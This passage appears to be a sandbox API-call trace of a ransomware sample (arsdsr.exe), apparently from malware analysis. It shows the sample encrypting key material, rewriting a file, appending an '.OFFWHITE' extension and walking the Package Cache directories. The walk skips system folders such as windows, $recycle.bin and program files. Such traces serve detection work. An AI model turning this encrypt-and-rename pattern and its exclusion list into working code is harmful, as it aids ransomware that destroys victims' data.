lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.406] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.406] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0148.406] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.406] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.406] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295dc90*=0x100) returned 1 [0148.406] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.406] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.406] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0148.406] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x28e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.406] SetLastError (dwErrCode=0x0) [0148.406] WriteFile (in: hFile=0x21c, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0148.408] GetLastError () returned 0x0 [0148.408] GetLastError () returned 0x0 [0148.408] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x38e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.408] WriteFile (in: hFile=0x21c, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0148.408] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x48e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.408] WriteFile (in: hFile=0x21c, lpBuffer=0x526d78*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x526d78*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0148.408] GetProcessHeap () returned 0x500000 [0148.408] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x28e) returned 0x53e5b0 [0148.408] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.409] ReadFile (in: hFile=0x21c, lpBuffer=0x53e5b0, nNumberOfBytesToRead=0x28e, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x53e5b0*, lpNumberOfBytesRead=0x295dec0*=0x28e, lpOverlapped=0x0) returned 1 [0148.409] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.409] WriteFile (in: hFile=0x21c, lpBuffer=0x53e5b0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53e5b0*, lpNumberOfBytesWritten=0x295decc*=0x28e, lpOverlapped=0x0) returned 1 [0148.409] GetProcessHeap () returned 0x500000 [0148.409] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53e5b0 | out: hHeap=0x500000) returned 1 [0148.409] CloseHandle (hObject=0x21c) returned 1 [0148.409] GetProcessHeap () returned 0x500000 [0148.409] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0148.409] GetProcessHeap () returned 0x500000 [0148.409] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0148.409] GetProcessHeap () returned 0x500000 [0148.409] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0148.409] GetProcessHeap () returned 0x500000 [0148.409] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0148.409] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" | out: lpString1="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" [0148.409] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.OFFWHITE") returned="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.OFFWHITE" [0148.409] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), lpNewFileName="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.OFFWHITE" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.offwhite")) returned 1 [0148.410] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd0b340, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd3ea4f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0148.410] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2=".") returned 1 [0148.410] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="..") returned 1 [0148.410] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="...") returned 1 [0148.411] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="windows") returned -1 [0148.411] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="$recycle.bin") returned 1 [0148.411] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="rsa") returned 1 [0148.411] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="ntuser.dat") returned 1 [0148.411] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="programdata") returned 1 [0148.411] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="appdata") returned 1 [0148.411] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="program files") returned 1 [0148.411] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="program files (x86)") returned 1 [0148.411] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\") returned="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\" [0148.411] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpString2="vcredist_x86.exe" | out: lpString1="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned="C:/Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" [0148.411] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.411] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.411] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0148.411] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0148.411] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd0b340, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd3ea4f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0148.411] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0148.411] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", cAlternateFileName="{37B8F~1.610")) returned 1 [0148.411] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2=".") returned 1 [0148.411] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="..") returned 1 [0148.411] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="...") returned 1 [0148.411] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="windows") returned -1 [0148.411] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="$recycle.bin") returned 1 [0148.411] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="rsa") returned -1 [0148.411] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="ntuser.dat") returned -1 [0148.412] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="programdata") returned -1 [0148.412] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="appdata") returned -1 [0148.412] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="program files") returned -1 [0148.412] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="program files (x86)") returned -1 [0148.412] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0148.412] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" [0148.412] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\" [0148.412] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\" [0148.412] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*" [0148.412] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0148.413] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.413] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0148.413] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.413] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.413] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 1 [0148.413] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0148.413] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0148.413] lstrcmpiW (lpString1="packages", lpString2="...") returned 1 [0148.413] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0148.413] lstrcmpiW (lpString1="packages", lpString2="$recycle.bin") returned 1 [0148.413] lstrcmpiW (lpString1="packages", lpString2="rsa") returned -1 [0148.413] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0148.413] lstrcmpiW (lpString1="packages", lpString2="programdata") returned -1 [0148.413] lstrcmpiW (lpString1="packages", lpString2="appdata") returned 1 [0148.413] lstrcmpiW (lpString1="packages", lpString2="program files") returned -1 [0148.413] lstrcmpiW (lpString1="packages", lpString2="program files (x86)") returned -1 [0148.414] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\" [0148.414] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\", lpString2="packages" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" [0148.414] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\" [0148.414] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\" [0148.414] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*" [0148.414] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0148.415] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.415] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0148.415] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.415] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.415] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfac0a1e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfac0a1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0148.415] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0148.415] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0148.415] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="...") returned 1 [0148.415] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="windows") returned -1 [0148.415] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="$recycle.bin") returned 1 [0148.415] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="rsa") returned 1 [0148.415] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="ntuser.dat") returned 1 [0148.415] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="programdata") returned 1 [0148.415] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="appdata") returned 1 [0148.415] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="program files") returned 1 [0148.415] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="program files (x86)") returned 1 [0148.415] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\" [0148.415] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\", lpString2="vcRuntimeAdditional_amd64" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" [0148.415] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\" [0148.415] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\" [0148.416] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*" [0148.416] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfac0a1e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfac0a1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0148.416] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.416] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfac0a1e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfac0a1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0148.416] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.416] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.416] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa87bcb00, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0xa87bcb00, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0xa87bcb00, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0x588124, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0148.416] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0148.416] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0148.416] lstrcmpiW (lpString1="cab1.cab", lpString2="...") returned 1 [0148.416] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0148.416] lstrcmpiW (lpString1="cab1.cab", lpString2="$recycle.bin") returned 1 [0148.416] lstrcmpiW (lpString1="cab1.cab", lpString2="rsa") returned -1 [0148.416] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0148.416] lstrcmpiW (lpString1="cab1.cab", lpString2="programdata") returned -1 [0148.416] lstrcmpiW (lpString1="cab1.cab", lpString2="appdata") returned 1 [0148.416] lstrcmpiW (lpString1="cab1.cab", lpString2="program files") returned -1 [0148.416] lstrcmpiW (lpString1="cab1.cab", lpString2="program files (x86)") returned -1 [0148.416] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\" [0148.417] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", lpString2="cab1.cab" | out: lpString1="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="C:/Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0148.417] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.417] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.417] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0148.417] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0148.417] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0148.417] lstrcmpiW (lpString1=".cab", 